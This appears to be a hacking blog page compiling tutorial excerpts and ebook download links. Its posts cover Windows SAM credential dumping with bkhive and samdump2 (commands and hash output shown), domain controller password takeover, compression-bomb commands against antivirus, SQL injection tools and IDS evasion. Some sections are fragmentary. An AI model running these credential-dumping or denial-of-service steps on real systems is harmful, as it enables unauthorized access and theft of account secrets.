Online Earning And Fav Hacking

Today I will share with all friends 
Online Earning And Fav Hacking Part 1
New Online Earing and Hacking Books which is fav all pro hackers.I am Also Learn From here You must try And Download Pass file to open all books (Secrets) Free downlaod 

Pass Down Here

(Ebook - Computer) Hacking The Windows Registry

Download Here

Anonymous-survival-guide-for-citizens-in-a-revolution

Download Here

Earning Money Online Is Possible

Download Here

Hacking Android For Profit 

Download Here

Hack Proofing Your Identity In The Information Age in PDF free Download

Download Here 

Online Earning And Fav Hacking Part 2 

Come Tomorrow                             
                   
       

Read More

Kevin Mitnick books

Physical entry”: slipping into a building of your target company. It’s something I never like to do. Way too risky. Just writing about it makes me practically break out in a cold sweat.

Download Free

Download Free

Fast Download

Get paid to share your links!

Download Free

Download Free

Fast Download

Social engineering (SE) has been largely misunderstood, leading to many differing opinions on what social engineering is and how it works. 

Download Free

Download Free

Fast Download

Read More

Physical Access Attacks Hacking

 Physical Access Attacks

If an attacker is able to gain physical access to a machine, chances are that he'll hack it. In almost every OS or network device, there exists a “physical backdoor” which allows for manual resetting of a device configuration.

"Technologies used for perimeter security involve, for instance, intrusion detection sensors and alarm systems. In the context of cryptographic implementations, “physical attack” is understood as a term which encompasses all attacks based on physical means against cryptographic devices."

First we see  Resetting Microsoft Windows 

 Resetting Microsoft Windows 

As discussed before, Windows stores local user passwords in the SAM. The SAM is locked by Windows and can not be accessed, copied or read while Windows is running. However, if we were to boot the same computer with a different OS (say Linux), then the SAM file would no longer be protected. Our newly booted Linux OS would see the SAM file as just another file on the Windows files system. We can then modify the SAM with specialized tools and reset passwords to our liking. Once the Windows machine boots back up, it will have new passwords in its SAM database.

Here we see that the Windows NTFS partition SDA1 is mounted, with read only (ro) permissions. Since we need to change the SAM file, we will require read / write permissions. 

BT ~ # umount /mnt/sda1/ 

BT ~ # modprobe fuse 
BT ~ # ntfsmount /dev/sda1 /mnt/sda1/ 
BT ~ # mount 
tmpfs on / type tmpfs (rw) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) usbfs on /proc/bus/usb type usbfs (rw) /dev/sda1 on /mnt/sda1 type fuse (rw,nosuid,nodev,default_permissions,allow_other) BT ~ #

Now we can dump the SAM file using BKHive and SAMdump

BT ~ # bkhive /mnt/sda1/WINNT/system32/config/system system.txt
Bkhive ncuomo@studenti.unina.it
Bootkey: dc155851060590ee807d3c660a437109 
BT ~ # samdump2 /mnt/sda1/WINNT/system32/config/sam system.txt >hashes.txt 
Samdump2 ncuomo@studenti.unina.it 
This product includes cryptographic software written by Eric Young (eay@cryptsoft.com)

No password for user Guest(501) 
BT ~ # cat Phashes.txt Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:::: NetShowServices:1001:4e239a9b2c8fca59049021d2a350c02c:021c54b8e10a4c420839b49a7cd21a66::: IUSR_WIN2KSP4:1003:76af34c719386a457aa40990e59dd60e:1c6560db5a2eb3f2da11bfd04d7c5a91::: IWAM_WIN2KSP4:1004:1cad3d74dee85109bb0b6cba129ef50e:7212a9f44e59a1b73d88fa7d670266db::: 

 we can modify the SAM using a use full tool such as chntpw:

Second Way is  Resetting a password on a Domain Controller

Resetting a password on a Domain Controller

Windows domain controllers do not store their user passwords in the local SAM, but in Active Directory. Active Directory can not be manually edited offline, so a different approach is taken. A Windows domain controller can be booted without Active Directory (Active Directory Restore Mode). This is usually done for Active Directory maintenance or defragmentation.  When Active Directory is not loaded, the domain controller will temporarily revert to local username authentication, and will once again use the SAM file present on the machine. A possible attack vector would be to reset/crack the Domain Controller's Local administrator password (By SAM manipulation or dumping) and then load it up in “Active directory restore mode” and log in with the modified / cracked password. Once logged in, a service is installed which executes the “net user” command (with SYSTEM privilages). Once the Domain Controller is rebooted and allowed to load Active Directory, the service adds/modifies the user and allows us to log in with our altered password. 

Third is Resetting a Cisco Device 

  Resetting a Cisco Device 

In Linux, a similar technique is used to reset root passwords. The machine is either booted in single mode or booted off a different operating system in order to manually change the /etc/shadow file.

More Info

Read More

Use of Wireshark

 Using Of Wireshark

Learning how to use a sniffer effectively is probably one of the most important network-related lessons you can take, and I strongly recommend that practiced as much as possible. 

Download Wireshark For Windows

•  Peeking at a Sniffer 

Let's begin by peeking into a Wireshark capture file. This capture was taken as I ran dhclient eth0 and then opened my browser and browsed to http://www.offensive-security.com(This is most lovely site to learn Hacking). Looking at this for the first time might be overwhelming. However, take a deep breath, examine the packet capture line by line, and implement your knowledge of TCP/IP. 

Packet 1: DHCP Request. You ran dhclient, which broadcasts a DHCP request to a local DHCP server. Notice the broadcast destination address 255.255.255.255 and the source IP address 0.0.0.0. 

Packet 2: A DHCP server (192.168.1.1) replies in a unicast packet and assigns the IP 192.168.1.107. At this point the browser was opened, attempting to browse to www.offensive-security.com.

Packet 3: ARP Broadcast. You've attempted to send a packet to the Internet, and before your computer can actually send it, it needs to identify the default gateway on the local network. The default gateway IP address is configured on the requesting machine, but the default gateway MAC address is unknown. My machine sends a broadcast to the whole network, asking, “Who has 192.168.1.1? Tell 192.168.1.107.”

Packet 4: All computers on the local subnet receive this broadcast and check whether 192.168.1.1 belongs to them. Only 192.168.1.1 responds to this ARP broadcast and sends an ARP unicast reply to 192.168.1.107, informing it of the MAC address requested.

Packet 5: Now that your computer knows where to send its packets in order for them to reach the internet, you need to resolve the IP of www.offensive-security.com. Your computer sends a DNS query to the DNS server defined in your TCP/IP settings (24.224.127.143) and asks the DNS server for the IP address (A record) of www.offensive-security.com.

Packet 6: The DNS server replies and tells your computer that the IP address for www.offensive-security.com is 208.88.120.8.

Packet 7: Armed with this information, your computer attempts a three-way handshake (remember that buzzword from TCP/IP?) with 208.88.120.8 on port 80 and sends an SYN request.

Packet 8: The web server responds with an ACK and sends an SYN to your machine. Packet 9: You send a final ACK to the web server and complete the three-way handshake.

Packet 10: Now that the handshake is complete, your computer can start talking with the service using a specific protocol. Since you're using a web browser, your computer sends an HTTP GET request, which retrieves the index page, and all linked images, to your browser.

Packet 11: – end: The main page of www.offensive-security.com, including all linked images, is

loaded in your browser. 

 Capture and Display Filters (CDF)

Capture dumps are rarely as clear as this since there is usually a lot of background noise on a network. Various broadcasts, miscellaneous network services, and other running applications all make life harder when it comes to traffic analysis. Wireshark has two very convenient filter schemes: capture filters and display filters. Understanding how to use these filters is a recipe to conquering Wireshark.   

 Following TCP Streams  

As you may have noticed, packets 9–end are a bit difficult to comprehend because they contain fragments of information. Most modern sniffers, Wireshark included, know how to reassemble a specific session and display it in various formats.

Read More

The Antivirus Hackers

The Antivirus 

Introduction to Antivirus Software 

Antivirus software is designed to prevent computer infections by detecting malicious software, commonly called malware, on your computer and, when appropriate, removing the malware and disinfecting the computer.

What is Antivirus software?

Antivirus software is special security software that aims to give better protection than that offered by the underlying operating system (such as Windows or Mac OS X).AV software uses various techniques to identify malicious software, which often self-protects and hides deep in an operating system.

Typical Misconceptions

Discovering known malicious patterns and bad behaviors in programs

Discovering known malicious patterns in documents and web pages

Discovering known malicious patterns in network packets

Features of Antivirus 

There are  following  common features found in AV products/software....

The capability to scan compressed files and packed executable..

Tools for performing on-demand or real-time file or directory scanning..

A self-protection driver to guard against malware attacking the actual AV..

Firewall and network inspection functionality..

Command-line and graphical interface tools..

A daemon or service ..

A management console..

Advanced Features

The following some of the most common advanced features supported by AV products..

• Packet Filters and Firewalls
• Self-Protection
• Anti-Exploiting

 Update System

Antivirus software is updated more often than most types of software on your computer.All modern antivirus software implements some sort of auto-updating feature. The components that are updated include the core kernel files, signature files, GUI, tools, libraries, or other product files.These update rules are not set in stone, because sometimes when an update is performed, the entire set of signatures and plug-in files is changed.

Understanding the Update Protocols 

There are some commonalities between all the update protocols:

They use HTTP or HTTPS (or both) for downloading signatures—In some rare cases, FTP has been observed (mainly in obsolete or old products).

They include catalog files—The list of downloadable files and remote relative URIs or full URLs is available in one or more catalog files. Such catalog files may contain information about the supported platforms and different product versions.

They verify the downloaded files—The downloaded update files are usually verified before the old files are updated. Although each antivirus product goes through a verification process, they do so in very different ways, from using simple CRC checks (Cyclic Redundancy Checks) to RSA (a public key-based Crypto system) signatures.

Understanding Antivirus Signatures

Signatures are a key part of any antivirus engine. The signatures are typically hashes or byte-streams that are used to determine whether a file or buffer contains a malicious payload.

Typical Signatures

The following sections will cover the most notable signatures..

1. Byte-Streams

The simplest form of an antivirus signature is a byte-stream that is specific to a malware file and that does not normally appear on non-malicious files. An antivirus engine may simply search for this entire string:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

• Custom Checksums

Most antivirus engines create their own set of CRC-like signatures. 

The interesting point is that such custom checksums do not offer any benefit to antivirus developers (other than using a hashing function that is unknown, which forces a reverse-engineer analyzing the targeted AV engine to discover where that function is, analyze it, and, likely, implement it). 

• Checksums

The most typical signature-matching algorithm is used by almost all existing AV engines and is based on calculating CRCs. 

MODIFIED CRC ALGORITHMS

All the antivirus engines that have been analyzed so far use the CRC32 algorithm. However, in some cases, the original CRC32 algorithm is not used, but is replaced by a modifi ed version. For example, the tables of constants used by the original algorithm may be changed or the number of rounds may be changed. This is something that you must consider when analyzing the signatures of the antivirus product being targeted. CRC32 hashes can diff er from the original CRC32 algorithm and may cause you some headaches

Cryptographic Hashes

A cryptographic hash function generates a “signature” that univocally identifies one buffer and just one buffer, which thus reduces the odds of producing a false positive.The antivirus 

industry decided to use such hash functions because they do not produce false positives.

• Fuzzy Hashing

A fuzzy hash signature is the result of a hash function that aims to detect groups of fi les instead of just a single fi le, like the cryptographic hash functions’ counterparts do. A fuzzy hash algorithm is not affected by the same rules as a cryptographic hash; instead it has the following properties:

Minimal or no diffusion at all—A minimal change in the input should minimally affect the generated output and only to the corresponding block of output, if it affects it at all. In a good cryptographic hash, a minimal change in the input must change the complete hash.

No confusion at all—The relationship between the key and the generated fuzzy hash is easy to identify, corresponding one to one. For example, a tiny change in the fi rst block should change only the fi rst generated output byte (if at all).

A good collision rate—The collision rate must be defi ned by the actual application. For example, a high collision rate may be acceptable for spam detection, but it may not be suitable for malware detection (because of the high number of false positives it generates).Such a fi le will generate the following signature:

$ md5sum ls

 fa97c59cc414e42d4e0e853ddf5b4745  ls 

$ ssdeep ls 

ssdeep,1.1--blocksize:hash:hash,filename 1536:MW9/IqY+yF00SZJVWCy62Rnm1lPdOHRXSoyZ03uawcfXN4qMlkW:MW9/ZL/

 T6ilPdotHaqMlkW 

," ls"

Graph-Based Hashes for Executable Files

Some advanced antivirus products contain signatures for program graphs. A software program can be divided into two different kinds of graphs:

Call graph—A directed graph showing the relationships between all the functions in a program (that is, a graph displaying all callers and callees of each function in the software piece).

Flow graph—A directed graph showing the relationships between basic blocks (a portion of code with only one entry point and only one exit point) of some specific function.

Read More

Denial of Service

Denial of Service

Both local and remote denial-of-service (DoS) attacks against antivirus software are possible; indeed, one of the most common attacks is aimed at disabling AV protection.
"A DoS is an attack launched against software or against a machine running some software, with the aim of making the targeted software or machine unavailable."

Local Denial-of-Service Attacks

A local denial of service is a DoS attack that can be launched only from the same machine on which the targeted antivirus software is installed. There are common types of DoS Attacks.

• Compression Bombs

A simple, well-known, and widely available local denial-of-service attack against antivirus software is the compression bomb, also referred to as a zip bomb or the “zip of death.”

Creating a Simple Compression Bomb

In this section, you create a simple compression bomb using common standard Unix and Linux tools. First you need to create a big zero-filled file with the command dd:

dd if=/dev/zero bs=1024M count=1 > file

After creating this “dummy” file, you need to compress it. You can use any compression tool and format, such as GZip or BZip2. The following command creates a max 2GB dummy file and then directly compresses it with BZip2, resulting in a 1522-byte-long compressed file:

dd if=/dev/zero bs=2048M count=1 | bzip2 -9 > file.bz2

You can quickly check the resulting size by using the wc tool:

$ LANG=C dd if=/dev/zero bs=2048M count=1 | bzip2 -9 | wc -c 0+1 records in

0+1 records out 

2147479552 bytes (2.1 GB) copied, 15.619 s, 137 MB/s

1522

This is a really simple compression bomb attack.

==================================

Bugs in File Format Parsers

File format parser bugs can also be used locally to prevent an antivirus scanner from detecting malware. A non-trivial example of this is when the malware drops a malformed file that is known to trigger the bug in the antivirus file parser and cause it to die or become stuck (for example, an infinite loop).

Here is another easier example of how to implement a file format bug. Imagine you have two files with the following path structure:

base_dir\file-causing-parsing-bug.bin base_dir\sub-folder\real-malware.exe

Attacks against Kernel Drivers

Other typical examples of local DoS attacks against antivirus products are those focused on kernel driver vulnerabilities. Most antivirus products for Windows deploy kernel drivers that can be used to protect the antivirus program from being killed, to prevent a debugger from attaching to their services, to install a file system filter driver for real-time file scanning, or to install an NDIS mini-filter to analyze the network traffic. 

These tricks are a useful way, for example, to reboot the machine after performing some action without asking the user for confirmation or requiring high-level privileges. They can also be used in a multistage exploit. A hypothetical, yet possible, scenario follows: 

1. An attacker abuses a vulnerability that allows one of the following: a file to be copied to a user’s Startup directory, a bug that allows a driver to be installed, or a bug that allows a library to be copied in a location that will later be picked up and loaded in the address space of high-privileged processes after rebooting.

 2. The attacker then uses a kernel driver bug to force the machine to reboot so that the changes take effect.

Local DoS vulnerabilities in antivirus kernel drivers are very prolific; a few vulnerabilities appear each year, affecting a wide range of antivirus products from the most popular to the less known. 

Remote Denial-of-Service Attacks

Remote DoS vulnerabilities can also be discovered in antivirus products, as in any other software with a remote surface that is exposed. A remote denial of service is a DoS attack that can be launched remotely, targeting the antivirus software installed in the victim’s computer. There are many possible remote DoS attack vectors, with the following being the most common:

• Compression bombs, as in the case of local denial of services Bugs in fi le format parsers, as in the case of local denial of services
• Bugs in network protocol parsers.

• Attacks against antivirus network services that listen to network interfaces other than the loopback network interface (localhost IP address, 127.0.0.1)

Read More

Web Application Hacker’s Toolkit

Here We know about same basic of Web Application

A Web Application Hacker’s Toolkit

Some attacks on web applications can be performed using only a standard web browser.
Most Important
The most important item in your toolkit falls into this latter category, and operates as an intercepting web proxy, enabling you to view and modify all of the HTTP messages passing between your browser and the target application. 
Second Main Category
The second main category of tool is the web application scanner.
This is a product designed to automate many of the tasks involved in attacking a web application, 
from initial mapping through to probing for vulnerabilities.

What is Web Browsers?

A web browser is not exactly a hack tool, being the standard means by which web applications are designed to be accessed. 

Internet Explorer 
Microsoft’s Internet Explorer (IE) is currently the most widely used web browser, comprising approximately 60% of the market
 at the time of writing. Virtually all web applications are designed for and tested on IE, making it a good choice for an attacker because most applications’ content and functionality will be correctly displayed and usable within IE. 

Firefox 
Firefox is currently the second most widely used web browser, comprising approximately 35% of the market at the time of writing. The majority of web applications work correctly on Firefox; however, there is no native support for ActiveX controls

Opera
Opera is a relatively little-used browser, having less than 2% of the market share at the time of this writing. Relatively few applications are specifically tested on Opera. 

Integrated Testing Suites
After the essential web browser, the most useful item in your toolkit when attacking a web application is an intercepting proxy.
There are three leading suites in widespread use, which we will examine in this section:
Burp suite

Paros 

WebScarab 

Configuring Your Browser
If you have never set up your browser to use a proxy server, this is trivial to do on any browser. 

Then perform the steps required for your browser:

Internet Explorer
In Internet Explorer, go to Tools ➪ Internet Options ➪ Connections ➪ LAN settings. Ensure that the Automatically Detect Settings and Use Automatic Configuration Script boxes are not checked. Ensure that the Use a Proxy Server for Your LAN box is checked. In the Address field, enter localhost and in the Port field enter the port used by your proxy.  Click on the Advanced button, and ensure that the Use the Same Proxy Server for All Protocols box is checked. If the hostname of  the application you are attacking is matched by any of the expressions in the Do Not Use Proxy Server for Addresses Beginning With box, remove these expressions.
 Click OK on all the dialogs to confirm the new configuration.

Web Application Spiders
Web application spiders work in a similar way to traditional web spiders — by requesting web pages, parsing these for links to other pages, and then requesting those pages, continuing recursively until all of a site’s content has been discovered.
To accommodate the differences between functional web applications and traditional web sites, application spiders must go beyond this core function and address various other challenges, such as the following:

>> Forms-based navigation, using drop-down lists, text input, and other methods.

>> JavaScript-based navigation, such as dynamically generated menus.Multistage functions requiring actions to be performed in a defined sequence.

>> Authentication and sessions.

>> The use of parameter-based identifiers, rather than the URL, to specify different content and functionality.
The appearance of tokens and other volatile parameters within the URL query string, leading to problems identifying unique content.

>> Checking for the robots.txt file, which is intended to provide a blacklist of URLs that should not be spidered, but which an attacking spider can use to discover additional content.
Automatic retrieval of the root of all enumerated directories. This can be useful to check for directory listings or default content (see Chapter 17).

>> Automatic processing and use of cookies issued by the application, to enable spidering to be performed in the context of an authenticated session.

>> Automatic testing of session-dependence of individual pages. This involves requesting each page both with and without any cookies that have been received. If the same content is retrieved, then the page does not require a session or authentication. This can be useful when probing for some kinds of access control flaw (see Chapter 8).

>>  Automatic use of the correct Referer header when issuing requests. Some applications may check the contents of this header, and this function ensures that the spider behaves as far as possible like an ordinary browser. 

>> Control of other HTTP headers used in automated spidering.

>> Control over the speed and order of automated spider requests, to avoid overwhelming the target, and if necessary behave in a stealthy manner.
                                                     Burp suite     Paros      WebScarab 

Application Fuzzers and Scanners
While it is possible to perform a successful attack using only manual techniques, to become a truly accomplished web application hacker, you need to make use of automation in your attacks, to enhance their speed and effectiveness. 

The following features are implemented in the different tool suites:

>> Automated scans to detect common vulnerabilities.

>> Manually configured scanning for common vulnerabilities.

>> A set of built-in attack payloads and versatile functions to generate arbitrary payloads in user-defined ways — for example, based on malformed encoding, character substitution, brute force, data retrieved in a previous attack, and so on.

>> Ability to save scan response data to use in reports or incorporate into further attacks.

>> Customizable functions for viewing and analyzing responses — for example, based on the appearance of specific expressions or the attack payload itself.

>> Functions for extracting useful data from the application’s responses — for example, by parsing out the username and password fields in a My Details page.

>> Functions for analyzing cookies and other tokens for any sequences.

Read More

SQL Injection Tools

 SQL Injection Tools

There are many tools which we discuss

BSQL Hacker is an automated SQL Injection Tool designed to exploit SQL injection vulnerabilities in virtually any database.

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

Marathon Tool is a malicious user

 can send heavy queries to perform a Time-Based 

Blind SQL Injection attack

Note:: You download this tools by click them..........

SQL Queries

SQL is a domain-specific language used in programming and designed for managing data held in a relational database management system, or for stream processing in a relational data stream management system.

Work OF SQL Query

Injection of SQL query will be executed on the server and replied by the

response.

SELECT * FROM [Orders]

These commands will reveal all information stored in the database "Orders"

table. If an organization maintains records of their orders into a database, all

information kept in this database table will be extracted by the command. 

SQL Delete Query

The DELETE statement is used to delete existing records in a table. To

understand, consider a table “Customers” in a database. The following

information is the table “Customers” is containing.

HERE 

You can see that an attacker perform SQL Injection attack on a website 

Here You can See when An attacker attack on a website he get same information like this 

===================================

For Android 

===================================

Tools

1. 
2.  

This is most use full tools which  I use personally

==================================

In the last we read same Evasion Techniques

Evading IDS

In order to secure database, isolated deployment in a secure network location with an intrusion detection system (IDS) is recommended. IDS keep monitoring the network and host traffic as well as a database application. The attacker has to evade IDS to access the database, for this, it uses different evading techniques. For example, IDS using Signature-based Detection system In compare the input strings against the signature to detect intrusion. Now all you have to do is to evade the signature-based detection.

Types of Signature Evasion Techniques

• In-line Comment
• Char Encoding
• String Concatenation 
• obfuscated Codes
• Manipulating White Spasea
• Hex Encoding 
• Sophisticated Matches 

What is  SQL Injection ???????????

Read More

SQL Injection

A.o.A

" SQL Injection"

SQL

 SQL stand of Structured Query Language (SQL) injection is covered.

 SQL Injection is basically insertion of malicious code or script by exploiting vulnerabilities to launch an attack powered by baCk-end components.

SQL Injection is a popular and complex method of attack on web services,applications, and Databases.

It requires deep knowledge about web application processes and its components such as databases and SQL.

SQL Injection Attacks uses SQL websites or web applications. It relies on the strategic injection of malicious code or script into existing queries.

SQL injection is a powerful and dangerous attack. It identifies the flaws and vulnerabilities in a website or application

SQL injection vulnerability

Types of SQL Injection

SQL Injection can be classified into three major categories:

ln-band SQLi

In-Band SQL injection is a category which includes injection techniques

using same communication channel to launch the injection attack and gather

information from the response. In-Band Injection techniques include: -

Error-based SQL Injection

Union based SQL Injection

lnferential SQLi

In an Inferential SQL Injection, no data is transferred from a Web 

application.The attacker is unable to see the result of an attack hence

referred as a Blind injection.

Out-of—band SQLi 

Out-of—band SQL injection is the injection technique that uses different

channels to launch the injection and gather the responses. It requires some

features being enabled such as DNS or HTTP requests on database server

hence it is not very common

SQL Injection Methodology

>Information Gathering and SQL Injection Vulnerability Detection

>Launch SQL Injection Attacks

>Advanced SQL Injection

In the  phase of information gathering , Collect the information about the web

application, operating system, database and the structure of the components.

Evaluation of extracted information will be helpful to identify the

vulnerabilities to exploit. Information can be gathered by using different tools

and techniques such as injecting codes into the input fields to observe the

response of error messages. Evaluation of input field, hidden fields, get and

post requests, cookies, string values and detailed error messages can reveal

enough information to initial injection attack.

Appropriate SQL injection attack from the category cab be initiate just after

gathering the information about the structure of database and vulnerabilities

found. By exploiting them, the injection can be successful. SQL injection

attacks such as Union SQL injection, Error-based SQL injection, Blind SQL

injection and other can be used to extract information from the database such

as extracting Database name, tables, columns, rows, and fields. The injection

can also have intended for bypassing the authentication.

Advanced SQL injection may include an enumeration of databases like

MySQL, MSSQL, MS Access, Oracle, DB2, or Postgre SQL, tables and

column in order to identify privilege level of users, account information of

database administrator and database structure disclosure. it also includes

passwords and hashes grabbing, and transferring the database to the remote

machine.

Testing of SQL Injection

Read More